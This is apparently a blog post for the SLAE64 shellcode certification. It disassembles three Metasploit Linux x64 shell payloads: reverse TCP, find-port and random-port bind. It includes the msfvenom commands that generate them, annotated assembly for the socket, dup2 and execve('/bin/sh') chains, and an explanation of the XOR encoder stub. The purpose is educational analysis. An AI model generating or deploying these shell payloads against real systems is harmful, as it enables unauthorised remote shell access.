There are 9 different payloads besides meterpreter ones at the time of this writing. Some payloads seem more interesting than others, my picks are:
- linux/x64/shell_reverse_tcp: Let’s see how different this implementation is from the custom reverse shell I wrote.
- linux/x64/shell_find_port: I’m interested in how this payload goes about finding the open port.
- linux/x64/shell_bind_tcp_random_port: It’ll be interesting to see how the random choice is made.
Issue this command to generate the payload:
msfvenom -a x64 --platform linux -p linux/x64/<PAYLOAD> -f <FORMAT>
Now we’ll need to disassemble this code. In order to do this, I exported the payloads in raw format and disassemble them using radare2:
You can print the disassembled payload issuing:
> radare2 <PAYLOAD>.raw -c "pd $r"
# This will return the full disassembly view> radare2 <PAYLOAD>.raw -c "pi $r"
# This will return the instructions without the extra stuff
If you want to follow along I’d recommend having a Linux syscall table at hand since most of the code is about chaining system calls.
In order to test our shellcode we can parse it using xxd or any other similar tool, then generate an executable to run with gdb:
I’ve created a script that outputs a C compiled executable given a shellcode string:
2.a Analysis of “Shell Reverse TCP”
The first sample is the reverse TCP payload without any options:
The first block makes a socket syscall:
pop rax ; loads 0x29 into raxcdq ; fill rdx with 0spush 2
pop rdi ; loads 0x02 into rdipush 1
pop rsi ; loads 0x01 into rsisyscall ; sys_socket(ipv4,tcp,)
We can see the writer uses
push <val> and
pop <reg> after to avoid null bytes and reduce payload size. For 1 byte values, this combo occupies just 3 bytes:
6a29 push 0x29
58 pop rax
Compared with a
mov instruction this is a huge improvement:
48c7c029000000 mov rax, 0x29
Another nice trick is the use of
cdq. This instruction sign extends eax into rdx, so, given that eax is now positive rdx will be filled with zeros. Using this trick the writer is able to zero out rdx with just one byte!
99 cdq ; 1 byte long, no null bytes; Compared with other options:48c7c200000000 mov rdx,0 ; 7 bytes long, contains null bytes6a00 push 0
5a pop rdx ; 3 bytes long and contains a null byte4831d2 xor rdx,rdx ; 3 bytes long, no null bytesNext block:
As we now have a socket ready the following block handles the connection:
xchg rax, rdi ; the socket file descriptor is loaded into rdimovabs rcx, 0x100007f5c110002
mov rsi, rsp ; loads address of 0x100007f5c110002 into rsipush 0x10
pop rdx ; loads 0x10 as address lenpush 0x2a ; 0x2a is the "connect" syscall number
pop raxsyscall ; sys_connect syscall
We see another nice trick at the first line using
xchg rax,rdi to which loads the socket file descriptor into rdx using just two bytes!
Next couple of lines pushes a value into the stack and loads its address into rsi. What’s this value? let’s find out:
Looking into the syscalls table we can see the rdi register should hold a
struct sockaddr *uservaddr so it makes sense to be an address as the syscall needs a pointer to the struct. The content of the struct can be reverse engineered. We know it must contain an IP address. How many bytes are needed to represent an address? the answer is 4
256 = 2^8 = 1 byte needed
each ip address consist on 4 numbers, therefore bytes are nedded
During the following explanation take in consideration in the code we see the immediate 7,5 bytes value 0x100007f5c110002 but it will be placed as an 8 bytes value 0x0100007f5c110002 into rcx.
If we take the first 4 bytes from 0x0100007f5c110002 (0x0100007f) reverse the endianness and convert them to an IP we get 127.0.0.1.
Next value is the port number. 0x115c is the hex representation of 4444.
The next block loops over the file descriptors for stdin, stdout, and stderr and duplicates them using the dup2 syscall. The file descriptor for our recently opened socket is loaded into the rdi register already.
; we already laoded the socket fd into rdi
; remember we exchanged rax and rdi values in the last block 6a03 push 3
5e pop rsi ; loads 3 into rsi┌─> 48ffce dec rsi
╎ 6a21 push 0x21
╎ 58 pop rax ; load 0x21 into rax
╎ 0f05 syscall ; sys_dup2 syscall
└─< 75f6 jne 0x27
Two nice details from this part:
- The writer saves some bytes by having the value of rdi loaded in the previous block instead of passing it around from register to register or pushing it into the stack.
- The break condition of the loop is implemented without a
cmpinstruction. It just looks at the ZF (zero flag) which we’ll be set in the last round. Great way of saving some more bytes!
The last portion of the code corresponds to the actual shell being popped. An execve “/bin/sh” call is made. Let’s see how:
6a3b push 0x3b
58 pop rax ; loads 0x3b into rax99 cdq ; fill rdx with zeros48bb2f62696e movabs rbx, 0x68732f6e69622f ; '/bin/sh'
53 push rbx
4889e7 mov rdi, rsp ; loads the value '/bin/sh' into rdi
52 push rdx ; pushes a nullbyte into the stack
57 push rdi ; pushes '/bin/sh' into the stack
4889e6 mov rsi, rsp ; loads the address of the null-terminated
; string '/bin/sh' into rsi0f05 syscall ; sys_execve syscall
Now let’s compare this raw version with the one without bad characters. I used a list of common bad characters (such as null-byte, space, break, etc) to produce another payload. The exact command used is:
msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp -f raw -b '\x00\x09\x0a\x0d\x1a\x20' > msfvenom-shell_reverse_tcp_NOBADCHARS.raw
The result was this:
Basically, msfvenom avoided using bad chars by implementing a xor encoder. This worked but also got our shellcode from 73 bytes long up to 119 a 63% rise in size. Let’s see how the decoder stub works, the rest of it we have covered already:
; fills rcx with zeros, then changes its value to 0x0a (10)
4831c9 xor rcx, rcx
4881e9f6ffff sub rcx, 0xfffffffffffffff6
488d05efffff lea rax, [0x00000000] ; fills rax with zeros ; loads the key into rbx
48bba062921b movabs rbx, 0x2cbc29441b9262a0
┌─> 48315827 xor qword [rax + 0x27], rbx
╎ 482df8ffffff sub rax, 0xfffffffffffffff8
└─< e2f4 loop 0x1b
In summary, this loads the length of the encoded payload (in qwords) into rcx, a pointer to the start of the shellcode into rax and the decryption key into rbx. Then it goes from rax + 0x27 (0x26 is the length of the decode stub, so the encoded shellcode starts at address 0x27) to the end and performs a xor operation on the encoded shellcode using the provided key. After the process is done it executes the, now decoded, shellcode.
There’s something strange about this decoder stub: the rest of the payloads so far were written pretty tight in terms of size but here we have a bunch of 6 bytes instructions. The reveres TCP payload is 34 instructions and 73 bytes long, that gives us a ~2.15 bytes to instructions ratio. For the decoder stub, we have 7 instructions and 33 bytes. A surprising ratio of ~4.71!
2.b Analysis of “Shell Find Port”
4831ff xor rdi, rdi ; rdi = 0
4831db xor rbx, rbx ; rbx = 0
b314 mov bl, 0x14 ; rbx = 0x14 (20)
4829dc sub rsp, rbx ; makes space in the stack
; (20 bytes) 488d1424 lea rdx, [rsp] ; loads stack address into rdx
488d742404 lea rsi, [rsp + 4]┌─> 6a34 push 0x34
╎ 58 pop rax ; loads 0x34 (52) into rax
╎ 0f05 syscall ; sys_getpeername syscall
╎ 48ffc7 inc rdi
╎ 66817e021341 cmp word [rsi + 2], 0x4113
└─< 75f0 jne 0x14
If we check the manuals on getpeername syscall we’ll see it places the address of the peer connected to a given socket file descriptor.
It expects a file descriptor in rdi, so the payload starts with rdi in 0 and tries every single port value until it gets to the specified in the options, which is 16659 (0x4113) in this case. The peer name is populated into a socket struct (rsi is acting as a pointer to this struct).
After having found an open socket the payload goes and duplicates stdin, stdout, and stderr using a loop similar to what we just saw in the previous payload. and then executes a shell.
2.c Analysis of “Shell Bind TCP Random Port”
4831f6 xor rsi, rsi ; rsi = 0
48f7e6 mul rsi ; rax = 0 rdx = 0
ffc6 inc esi ; rsi = 1
6a02 push 2
5f pop rdi ; rdi = 2
b029 mov al, 0x29 ; rax = 0x29
0f05 syscall ; sys_socket syscall
We see here another technique to set rax and rdx to zero indirectly using
mul rsi which will multiply rsi (0) and rax and place the result into rax and rdx.
The next block makes a listen syscall, then accept syscall, then a loop invoking dup2 for each standard stream and finally the execve(“/bin/sh”).
; listen syscall block
52 push rdx
5e pop rsi
50 push rax
5f pop rdi
b032 mov al, 0x32
0f05 syscall ; sys_listen syscall ; accept syscall block
b02b mov al, 0x2b
0f05 syscall ; sys_accept syscall ; sys_dup2 is invoked 3 times, one for each stream
57 push rdi
5e pop rsi
4897 xchg rax, rdi
┌─> ffce dec esi
╎ b021 mov al, 0x21
╎ 0f05 syscall
└─< 75f8 jne 0x1f ; execve syscall block code
52 push rdx
48bf2f2f6269. movabs rdi, 0x68732f6e69622f2f ; '//bin/sh'
57 push rdi
54 push rsp
5f pop rdi
b03b mov al, 0x3b
0f05 syscall ; execve syscall
If we run this payload we see a connection being opened and it’s actually being fired on random ports but… where’s the random port selection? There’s no apparent place where a random number is generated!
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification
Student ID: SLAE64–1326